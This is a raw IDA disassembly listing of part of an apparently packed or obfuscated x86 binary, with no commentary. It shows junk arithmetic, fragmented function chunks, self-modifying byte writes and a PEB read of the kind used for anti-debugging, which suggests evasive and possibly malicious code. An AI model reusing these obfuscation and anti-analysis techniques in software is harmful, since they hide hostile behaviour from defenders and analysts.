		dd 1C9810Ah, 0E979F7C8h, 0FFFFD07Ch, 0C395E800h
		db 2 dup(0FFh)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48DE75

loc_48DA92:				; CODE XREF: sub_48DE75-28D0j
		jmp	nullsub_601
; END OF FUNCTION CHUNK	FOR sub_48DE75
; ---------------------------------------------------------------------------
		align 4
		dd 0D2348E0Fh, 94E9FFFFh, 1, 0EE296800h, 46E90048h, 8BFFFFC1h
		dd 8E95330h
		db 0F4h, 2 dup(0FFh)
; ---------------------------------------------------------------------------

loc_48DAB7:				; CODE XREF: eu81y7qg:loc_48E73Bj
		xor	ebx, 0F5FF7113h
		or	ebx, 4E838B8h
		and	ebx, 0AED35A2h
		call	sub_48D511
		add	[ebx], al
		retn
; ---------------------------------------------------------------------------
		or	ebx, 9BAE53B1h
		jmp	sub_48C2E0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B559

loc_48DADC:				; CODE XREF: sub_48B559:loc_48C3A4j
		call	sub_48C117
; END OF FUNCTION CHUNK	FOR sub_48B559
; ---------------------------------------------------------------------------
		db 2 dup(0), 0E9h
		dd 0FFFFBEA4h, 0F4FA890Fh, 0ECE9FFFFh, 0FFFFFEh, 0E9FA8700h
		dd 0FFFFDA2Ch
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48DE75

loc_48DAFD:				; CODE XREF: sub_48DE75-9B7j
		push	edx
		push	ecx
		pop	edx

loc_48DB00:				; DATA XREF: eu81y7qg:0048EC79o
		mov	ebx, 8A682414h
; END OF FUNCTION CHUNK	FOR sub_48DE75
; ---------------------------------------------------------------------------
		db 0D9h, 48h, 0
		dd 0FFFE75E9h
		db 0FFh, 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48DE75

loc_48DB0F:				; CODE XREF: sub_48DE75+30Dj
		mov	byte ptr [eax],	8Bh
		pop	eax
		push	69768B14h
		pop	esi
		jmp	loc_489F89
; END OF FUNCTION CHUNK	FOR sub_48DE75
; ---------------------------------------------------------------------------
		db 0
byte_48DB1F	db 83h			; DATA XREF: eu81y7qg:0048D5A7o
		dd 52B804C4h, 51000000h, 0C87CE8Bh
		db 24h,	68h, 0C0h
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B19F

loc_48DB2F:				; CODE XREF: sub_48B19F+299Cj
		ficomp	dword ptr [edi+1130E9C6h]
; END OF FUNCTION CHUNK	FOR sub_48B19F
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B19F

loc_48DB37:				; CODE XREF: sub_48B19F:loc_48B631j
		rol	eax, 7
		in	eax, dx
		loopne	loc_48DB2F
		stosb
		stosd
		imul	ebp, [eax-78h],	-2Eh
		dec	eax
		add	cl, ch
		and	bl, ch
; END OF FUNCTION CHUNK	FOR sub_48B19F
; ---------------------------------------------------------------------------
		dd 0FFFFh
; ---------------------------------------------------------------------------
		mov	byte ptr [eax],	8Bh

loc_48DB4F:				; CODE XREF: eu81y7qg:loc_48C5FEj
		pop	eax
		push	esi
		mov	esi, offset loc_4894FC
		jmp	near ptr byte_489BBD+2
; ---------------------------------------------------------------------------
		align 4
		dd 243C8700h, 2650685Fh, 815F1EFDh, 156601C7h, 0C7F73Dh
		dd 0E9008000h, 0FFFFC234h, 55870000h, 0C024E900h
		db 2 dup(0FFh),	0
; ---------------------------------------------------------------------------

loc_48DB83:				; CODE XREF: eu81y7qg:0048B78Bj
		mov	byte ptr [eax],	0FFh
		xchg	edi, [esp]
		mov	eax, edi
		pop	edi
		or	eax, 39525B7Bh
		jmp	loc_48C1E0
; ---------------------------------------------------------------------------
		align 4
; START	OF FUNCTION CHUNK FOR sub_489492

loc_48DB98:				; CODE XREF: sub_489492+1Ej
		push	offset loc_48B3B6
		jmp	nullsub_596
; END OF FUNCTION CHUNK	FOR sub_489492
; ---------------------------------------------------------------------------
		align 4
		dd 34870389h, 810F5E24h, 0FFFFE959h, 48964668h,	0E714E900h
		db 2 dup(0FFh)
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_559. PRESS KEYPAD	"+" TO EXPAND]
		align 4
dword_48DBBC	dd 0D19FF281h, 0D0032E47h, 0EE05C281h, 28E85729h, 0FFFFB9h
					; DATA XREF: sub_48E9EE-3D43o
		dd 0F512E900h, 0FFFFh, 0E081D1F7h, 627D8F1Bh, 0F4AA850Fh
		dd 0FFFFh, 7133EE81h
		db 7Ch,	5Fh
; ---------------------------------------------------------------------------

loc_48DBEE:				; CODE XREF: eu81y7qg:loc_48D268j
		jmp	near ptr dword_48CA04+11h
; ---------------------------------------------------------------------------
		align 4
		dd 0F840F00h
		db 0CDh, 2 dup(0FFh)

; =============== S U B	R O U T	I N E =======================================



sub_48DBFB	proc near		; CODE XREF: sub_48D9C3+9p

arg_0		= dword	ptr  4

		xchg	esi, [esp+0]
		pop	esi
		dec	ecx
		jnz	loc_48DA29
		xchg	edi, [esp-4+arg_0]
		mov	ecx, edi
		pop	edi
		jmp	near ptr dword_489BC0+11h
sub_48DBFB	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B528

loc_48DC11:				; CODE XREF: sub_48B528+Cj
		mov	edx, ecx
		xchg	edx, [esp+0]
		push	esi
		push	4F1DBC75h
		xchg	edi, [esp+8+var_8]
		jmp	loc_48C937
; END OF FUNCTION CHUNK	FOR sub_48B528
; ---------------------------------------------------------------------------
		db 0

; =============== S U B	R O U T	I N E =======================================



sub_48DC25	proc near		; CODE XREF: eu81y7qg:0048B9A0j
					; eu81y7qg:0048CAD8p
		xchg	ecx, [esp+0]
		pop	ecx
		push	offset loc_48D65C
		jmp	nullsub_591
sub_48DC25	endp

; ---------------------------------------------------------------------------

loc_48DC33:				; CODE XREF: eu81y7qg:0048EAB8j
		retn
; ---------------------------------------------------------------------------
		db 0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_578. PRESS KEYPAD	"+" TO EXPAND]
		dw 8700h
		dd 0E9582404h, 0FFFFF551h, 0FFEF91E9h
		db 0FFh
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48AEB5

loc_48DC45:				; CODE XREF: sub_48D9C3-33C0j
					; eu81y7qg:loc_48B129j	...
		push	offset loc_48C34D
		jmp	loc_48EAB2
; END OF FUNCTION CHUNK	FOR sub_48AEB5
; ---------------------------------------------------------------------------
		align 10h
		db 0
; ---------------------------------------------------------------------------

loc_48DC51:				; CODE XREF: eu81y7qg:0048A3E1j
		push	48D367Eh
		pop	edi
		and	edi, 0A237DADBh
		add	edi, 43BF57h
		jmp	loc_48B45D
; ---------------------------------------------------------------------------
		retn
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_570. PRESS KEYPAD	"+" TO EXPAND]
		align 4

loc_48DC6C:				; CODE XREF: eu81y7qg:0048C847j
		jmp	loc_48E6C8
; ---------------------------------------------------------------------------
		align 2

loc_48DC72:				; DATA XREF: sub_48D676+Ao
		push	offset byte_48DE97
		jmp	loc_48DFD6
; ---------------------------------------------------------------------------
		dd 8707C600h, 75C6815Fh, 374CBE1h, 0B98E8F5h, 0C6E90000h
		dd 0Ch
		db 0
; ---------------------------------------------------------------------------

loc_48DC95:				; CODE XREF: eu81y7qg:00489D66j
		call	sub_48ECD0
; ---------------------------------------------------------------------------
		dw 0
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48DE75

loc_48DC9F:				; CODE XREF: sub_48DE75+536j
		jmp	nullsub_477
; END OF FUNCTION CHUNK	FOR sub_48DE75
; ---------------------------------------------------------------------------
		dd 53E90000h, 0E9000004h, 4D9h,	68240C87h, 8ED558FAh, 0CDE6815Eh
		dd 52B98FBCh, 48D02ABAh, 0E47DE900h, 8700FFFFh,	0B7682404h
		dd 0E90048C1h, 0FFFFE4D5h, 0F4726800h, 815E6E8Bh, 53B3DDEEh
		dd 0DBC68175h, 6806C7BFh, 48BA58h, 0FFC1B8E9h
		db 0FFh
; ---------------------------------------------------------------------------

loc_48DCF5:				; CODE XREF: eu81y7qg:0048D241j
		and	eax, ebp
		add	ebp, 0A0B823A8h
		jge	loc_48C25B

loc_48DD03:				; CODE XREF: eu81y7qg:loc_48D233j
		add	eax, 0C96A6558h
		add	eax, ebp
		add	eax, 0AFC0D76Bh
		popf
		push	esi
		jmp	loc_48BD65
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48DD1A:				; CODE XREF: sub_48DD69-1389p
		xchg	esi, [esp]
		pop	esi
		add	ecx, 0EA48A239h
		call	sub_48A24C
		add	cl, ch
		adc	cl, [edx]
; ---------------------------------------------------------------------------
		db 3 dup(0)
		db 0
; ---------------------------------------------------------------------------

loc_48DD31:				; CODE XREF: eu81y7qg:0048DE4Aj
		pushf
		push	0FABC2439h
		pop	ecx
		rol	ecx, 16h
		or	ecx, 2F5E33F5h
		and	ecx, 0ADC118C8h
		jmp	near ptr loc_48E9CA+1
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_588. PRESS KEYPAD	"+" TO EXPAND]
		db 2 dup(0)
byte_48DD4F	db 58h			; DATA XREF: sub_48BDF1+7o
		dd 0C0C015FFh, 0E9500045h, 0FFFFFF32h, 0E9520000h, 0FFFFF21Ah
		dd 0C6C10000h
		db 0Fh

; =============== S U B	R O U T	I N E =======================================



sub_48DD69	proc near		; CODE XREF: eu81y7qg:loc_48C671p

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0048B22C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048B7D5 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0048B9BB SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0048C317 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0048C9D4 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0048CED4 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0048E6F5 SIZE 00000006 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		push	ecx
		jmp	loc_48B7D5
sub_48DD69	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_48DD73:				; CODE XREF: eu81y7qg:0048D793j
		test	esi, ebx
		jmp	loc_48C5FE
; ---------------------------------------------------------------------------
		dw 0C300h
		dd 0FFC9F4E9h
		db 0FFh
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48DE75

loc_48DD81:				; CODE XREF: sub_48DE75+65Dj
		jmp	loc_48A4E4
; END OF FUNCTION CHUNK	FOR sub_48DE75
; ---------------------------------------------------------------------------
		align 4
		dd 24E9EA23h, 87FFFFEDh, 8B582404h, 0A1C46800h,	1CE90048h
		dd 0FFFFC4h
		db 0
byte_48DDA1	db 64h,	8Bh, 5		; DATA XREF: sub_48DE75:loc_48E38Eo
		dd 18h,	2F1CC081h, 6856AF3Dh, 0D367FF68h, 9BCE815Eh, 0E90CF4A3h
		dd 0FFFFE704h, 0BA0D081h, 1CE92508h, 0FFFFF4h
		db 0
; ---------------------------------------------------------------------------

loc_48DDCD:				; CODE XREF: eu81y7qg:loc_48E8E7j
		add	eax, 4
		push	esi
		push	edx
		mov	edx, eax
		jmp	near ptr loc_48C576+1
; ---------------------------------------------------------------------------
		db 2 dup(0), 9Dh
		dd 0FFE522E9h, 0FDB900FFh, 3C5FD5Ah, 3DFE9D8h, 0
; ---------------------------------------------------------------------------

loc_48DDF0:				; DATA XREF: sub_48CFEF:loc_48EBA6o
		mov	[ebx], eax
		pop	ebx
		pushf
		push	6DCE55D7h
		pop	eax
		sub	eax, 0DEF64977h
		add	eax, 38DD9D4Bh
		jmp	loc_48B11D
; ---------------------------------------------------------------------------
		align 4
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48C117

loc_48DE0D:				; CODE XREF: sub_48C117:loc_489AB9j
		xor	edi, 0FF0208CCh
		call	near ptr sub_48DE75
; END OF FUNCTION CHUNK	FOR sub_48C117
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48DE1A:				; CODE XREF: eu81y7qg:0048D05Fj
		jmp	near ptr byte_48A325+2
; ---------------------------------------------------------------------------
		db 0Fh
		dd 0FFD5A98Ah
		db 0FFh

; =============== S U B	R O U T	I N E =======================================



sub_48DE25	proc near		; CODE XREF: sub_48D1F9-C88p
		xchg	edx, [esp+0]
		xchg	edi, [esp+0]
		mov	edx, edi
		pop	edi
		mov	al, [eax]
		push	offset loc_48D8BE
		jmp	nullsub_566
sub_48DE25	endp

; ---------------------------------------------------------------------------
		align 4

loc_48DE3C:				; CODE XREF: eu81y7qg:loc_48AD29j
		rol	ebx, 0Ch
		add	ebx, 0CB28C4D4h

loc_48DE45:				; DATA XREF: sub_48DE75+5o
		cdq
		xchg	ebx, [esp]
		push	ecx
		jmp	loc_48DD31
; ---------------------------------------------------------------------------
		align 10h
		xor	esi, 0A9EA76D6h
		and	esi, 0A0A83A0Eh
		add	esi, 30BAC908h
		add	eax, esi
		pop	esi
		mov	eax, [eax]
		pushf
		add	eax, 97A8FD8Eh
		jmp	loc_48DF73
; ---------------------------------------------------------------------------
		align 4
		db 0

; =============== S U B	R O U T	I N E =======================================



sub_48DE75	proc far		; CODE XREF: sub_48DE75-41F5j
					; sub_48C117+1CFCp

var_14		= dword	ptr -14h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  4
arg_4		= dword	ptr  8
arg_8		= dword	ptr  0Ch
arg_C		= dword	ptr  10h
arg_14		= dword	ptr  18h
arg_18		= dword	ptr  1Ch
arg_16D4	= dword	ptr  16D8h
arg_16E0	= dword	ptr  16E4h
arg_16E8	= dword	ptr  16ECh
arg_16F4	= dword	ptr  16F8h

; FUNCTION CHUNK AT 004897D9 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00489803 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0048981A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00489868 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00489952 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00489968 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004899B4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00489B60 SIZE 0000002E BYTES
; FUNCTION CHUNK AT 00489C41 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00489C74 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00489F72 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00489F89 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0048A033 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048A072 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0048A16E SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0048A2F9 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0048A4E4 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0048A55A SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0048A57D SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0048A691 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0048A8B9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048A8DE SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0048A95B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048A97D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0048AC50 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048AD56 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0048ADCD SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0048ADDD SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0048AE38 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0048AF39 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0048AFD2 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0048B07F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0048B12E SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0048B36B SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0048B3FB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048B402 SIZE 0000002C BYTES
; FUNCTION CHUNK AT 0048B501 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0048B590 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0048B5A0 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0048B802 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048B976 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048BA82 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0048BB7F SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0048BB93 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048BBD8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048BD22 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0048BDA3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048BE0B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048BE5F SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0048BECE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048BF4E SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0048BFE1 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0048C1C7 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0048C20F SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0048C258 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 0048C3BD SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0048C4BD SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0048C550 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0048C58C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048C642 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0048C659 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0048C6E5 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0048C7F7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048C8B5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048C8F4 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0048C92D SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0048CA65 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0048CB00 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048CB06 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0048CB4F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048CB56 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048CCD8 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0048CD05 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0048CE0C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048CE21 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0048CF6D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048D1AA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048D356 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0048D395 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0048D3AA SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0048D3D4 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0048D458 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048D4A9 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0048D8AF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048D926 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048D93E SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0048DA92 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048DAFD SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0048DB0F SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0048DC9F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048DD81 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048E87E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048EB63 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048EC2F SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0048EE72 SIZE 0000000D BYTES

		xchg	edx, [esp-6+arg_0+2]
		pop	edx
		push	esi
		mov	esi, offset loc_48DE45
		jmp	loc_48E637
; ---------------------------------------------------------------------------
		dd 840F0000h, 0FFFFE389h, 48DB5D68h, 0BAA3E900h
		db 2 dup(0FFh),	0
byte_48DE97	db 8Bh			; DATA XREF: eu81y7qg:loc_48DC72o
		dd 240C8709h, 0C0C015FFh, 62680045h, 0E90048D3h, 0FFFFE5A2h
		dd 0C5E95700h
		db 0EDh, 2 dup(0FFh)
; ---------------------------------------------------------------------------

loc_48DEB3:				; CODE XREF: eu81y7qg:0048E99Cj
		push	edi
		mov	edi, offset loc_489C8B
		jmp	loc_48ADCD
; ---------------------------------------------------------------------------

locret_48DEBE:				; CODE XREF: eu81y7qg:0048C1EBj
		retn
; ---------------------------------------------------------------------------
		align 10h

loc_48DEC0:				; CODE XREF: sub_48E8A9+8j
					; sub_48DE75:loc_48EC34j
		jmp	loc_48C92D
; ---------------------------------------------------------------------------
		align 2
word_48DEC6	dw 0F081h		; DATA XREF: eu81y7qg:0048C1E6o
		dd 6987D14Eh, 0FFB9D3E8h
		db 0FFh
; ---------------------------------------------------------------------------

loc_48DED1:				; CODE XREF: sub_48DE75+104j
		call	near ptr dword_48BEF8+17h

loc_48DED6:				; CODE XREF: sub_489D89+Aj
		jmp	loc_48A691
; ---------------------------------------------------------------------------
		align 4
		adc	edi, 1096891Eh

loc_48DEE2:				; CODE XREF: eu81y7qg:0048EA24j
		jmp	loc_48A55A
; ---------------------------------------------------------------------------
		db 0Fh
		dd 0FFF4808Dh, 3EE281FFh, 0E974154Eh, 0FFFFB5FFh
		db 0
; ---------------------------------------------------------------------------

loc_48DEF9:				; CODE XREF: eu81y7qg:0048D656j
		pop	esi
		add	eax, 8F803FF5h
		xor	eax, 1CCCC20h
		and	eax, 82ED6FA1h
		cmp	eax, 0BE7475DCh
		jmp	loc_4897DE
; ---------------------------------------------------------------------------
		align 4

loc_48DF18:				; CODE XREF: eu81y7qg:0048B99Aj
		not	ebx

loc_48DF1A:				; CODE XREF: sub_48DE75-9BCp
		xchg	ebx, [esp-6+arg_0+2]
		pop	ebx
		add	esi, 0F747E3AFh
		push	offset loc_48A7A7

loc_48DF29:				; CODE XREF: eu81y7qg:0048A6A8j
		jmp	loc_48A8B9
; ---------------------------------------------------------------------------
		align 10h

locret_48DF30:				; CODE XREF: eu81y7qg:0048C90Ej
		retn
; ---------------------------------------------------------------------------
		db 2 dup(0), 0FFh
		dd 15FFFC75h, 45C0C0h, 0FFCA8DE8h, 0D08D0FFFh
; ---------------------------------------------------------------------------
		retf	0FFFFh
; ---------------------------------------------------------------------------

loc_48DF47:				; CODE XREF: sub_48DE75+14Ap
		xchg	edx, [esp-6+arg_0+2]
		pop	edx
		or	edx, edx
		jz	loc_48A8D2
		push	esi
		mov	esi, eax
		xchg	esi, [esp-6+arg_0+2]
		jmp	loc_489F72
; ---------------------------------------------------------------------------
		dw 8B00h
		dd 925CBA17h, 0C6F7E6E5h, 6E067B86h, 0FFDC89E9h
		db 0FFh, 2 dup(0)
; ---------------------------------------------------------------------------

loc_48DF73:				; CODE XREF: eu81y7qg:0048DE6Ej
		push	esi
		mov	esi, offset byte_48ECED
		jmp	loc_48DED1
; ---------------------------------------------------------------------------
		align 10h

loc_48DF80:				; CODE XREF: sub_48CA30:loc_48A643p
		xchg	ecx, [esp+0]
		pop	ecx
		mov	byte ptr [ecx],	8Bh
		xchg	ebx, [esp-6+arg_0+2]
		jmp	loc_48C550
; ---------------------------------------------------------------------------
		align 10h
		dd 254BEF68h, 0E6815E5Bh, 27ACFFC4h, 6F07C681h,	0CE8177D8h
		dd 30B2433Eh, 0FFD8A9E9h, 0C30000FFh, 0C7F7h, 0ABE91000h
		db 0F4h, 2 dup(0FFh)
; ---------------------------------------------------------------------------

locret_48DFBB:				; CODE XREF: sub_48CBF4+Dj
		retn
; ---------------------------------------------------------------------------

loc_48DFBC:				; CODE XREF: eu81y7qg:0048BA9Bj
					; sub_48DD69-E81j
		xchg	eax, [esp+0]
		call	loc_48DF47

loc_48DFC4:				; CODE XREF: eu81y7qg:0048EB70j
		jmp	nullsub_576
; ---------------------------------------------------------------------------
		db 2 dup(0), 9Dh
; ---------------------------------------------------------------------------
		xor	edi, ecx
		jmp	sub_48D676
; ---------------------------------------------------------------------------
		align 4
		retn
; ---------------------------------------------------------------------------
		align 2

loc_48DFD6:				; CODE XREF: eu81y7qg:0048DC77j
		jmp	nullsub_607
; ---------------------------------------------------------------------------
		align 4

loc_48DFDC:				; CODE XREF: eu81y7qg:0048BEF3j
		jmp	loc_48E232
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48DFE3:				; CODE XREF: eu81y7qg:loc_48BA34j
		jmp	loc_48CE21
; ---------------------------------------------------------------------------
		push	48BEA1h
		jmp	nullsub_609
; ---------------------------------------------------------------------------
		dw 8100h
		dd 89F5D3C1h
		db 17h
byte_48DFF9	db 0A9h, 0Ch, 24h	; DATA XREF: sub_48CA8B-66o
; ---------------------------------------------------------------------------
		jmp	loc_48BBD8
; ---------------------------------------------------------------------------
		mov	eax, large fs:30h
		push	48CD12h
		jmp	nullsub_610
; ---------------------------------------------------------------------------
		align 4

loc_48E014:				; CODE XREF: sub_48B985:loc_48C426j
		xor	[eax-3Ch], ebp
		scasb
		cmp	ah, dh
		xchg	edi, [esp+0]
		mov	ecx, edi
		jmp	loc_48AC50
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------

locret_48E026:				; CODE XREF: eu81y7qg:loc_48D4EBj
		retn
; ---------------------------------------------------------------------------
		align 4
		dd 0C6F7F013h, 40226343h, 0FFF7A5E9h
		db 0FFh, 2 dup(0)
; ---------------------------------------------------------------------------

loc_48E037:				; CODE XREF: sub_48AD49:loc_48CF1Fj
		pop	edi
		mov	byte ptr [edi],	0C3h
		pop	edi
		push	ecx
		mov	ecx, [esp+10h]
		jmp	loc_48A16E
; ---------------------------------------------------------------------------
		align 4
		retn
; ---------------------------------------------------------------------------
		db 0C6h, 0, 9Dh
		dd 95336858h, 6EE90048h, 0FFFFD8h, 0D5C08100h, 0E8CC3EBDh
		dd 0FFFFD8B0h
		db 0
; ---------------------------------------------------------------------------

loc_48E065:				; CODE XREF: eu81y7qg:0048CC0Fj
		jmp	locret_48E529
; ---------------------------------------------------------------------------

loc_48E06A:				; CODE XREF: eu81y7qg:00489F06j
		jmp	near ptr byte_489665+2
; ---------------------------------------------------------------------------
		align 10h
		dd 0F4DFCA68h, 0C1C15969h, 87F18112h, 0E97F29A7h, 0FFFFCFE3h
; ---------------------------------------------------------------------------

loc_48E084:				; CODE XREF: sub_48DE75+401j
		push	ecx
		push	9CFAD746h
		pop	ecx
		xor	ecx, 0AA1B57FCh

loc_48E091:				; CODE XREF: eu81y7qg:loc_48CA3Dj
		sub	ecx, 0D1EFDC64h
		jmp	loc_48D458
; ---------------------------------------------------------------------------
		dd 2C87E98Bh, 0A7AFB924h, 68E90048h, 0FFFFC7h, 768C0Fh
		dd 0DB810000h, 91AE4610h, 0FFC3BBE9h, 0E99CC3FFh, 0FFFFD7EEh
		dd 5DF281C3h, 81E49B7Bh, 68AA9CEAh, 2CA814Eh, 81B599A8h
		dd 72C088F2h, 0E9D5033Dh, 0FFFFEA92h
		db 0
byte_48E0E5	db 68h,	29h, 0B7h	; DATA XREF: eu81y7qg:0048A158o
		dd 815F0CB1h, 0CCE8D6F7h, 2CCF81F4h, 0E9AC5C17h, 0FFFFFEB4h
		dd 0C30000h, 50241C87h,	0EEE9C78Bh, 0FFFFC2h
		db 0
; ---------------------------------------------------------------------------

loc_48E10D:				; CODE XREF: sub_48DE75:loc_48BE0Bj
		call	sub_48A4BF
; ---------------------------------------------------------------------------
		dw 0
		dd 3191C6F7h, 0D0E9479Eh, 0FFFFCFh, 878D02C6h, 0D08B2404h
		dd 0D203E858h
		db 2 dup(0FFh),	0
; ---------------------------------------------------------------------------

locret_48E12F:				; CODE XREF: sub_4894C2:loc_48C9FEj
		retn
; ---------------------------------------------------------------------------
		dd 880F0000h, 0FFFFD945h
; ---------------------------------------------------------------------------

loc_48E138:				; CODE XREF: sub_48BE6F+8F1j
		push	ebx
		mov	ebx, ecx
		xchg	ebx, [esp+8+var_8]
		mov	ecx, 48B41Ah
		jmp	loc_48BE0B
; ---------------------------------------------------------------------------
		dd 0FF810000h, 0AD851746h, 0FFCB02E9h
; ---------------------------------------------------------------------------
		inc	dword ptr [eax]

loc_48E156:				; CODE XREF: sub_48B8B2+2FDFp
		xchg	eax, [esp+8+var_8]
		xchg	edx, [esp+8+var_8]
		mov	eax, edx
		pop	edx
		push	esi
		mov	esi, edi
		jmp	near ptr dword_489898+23h
; ---------------------------------------------------------------------------
		align 4

loc_48E168:				; CODE XREF: eu81y7qg:0048E7C4j
		mov	byte ptr [eax],	8Bh
		pop	eax
		push	48BDAAh
		jmp	nullsub_612
; ---------------------------------------------------------------------------
		align 4

loc_48E178:				; CODE XREF: eu81y7qg:0048B9AEp
		xchg	esi, [esp+8+var_8]
		pop	esi
		push	eax
		mov	eax, offset byte_48AAAF
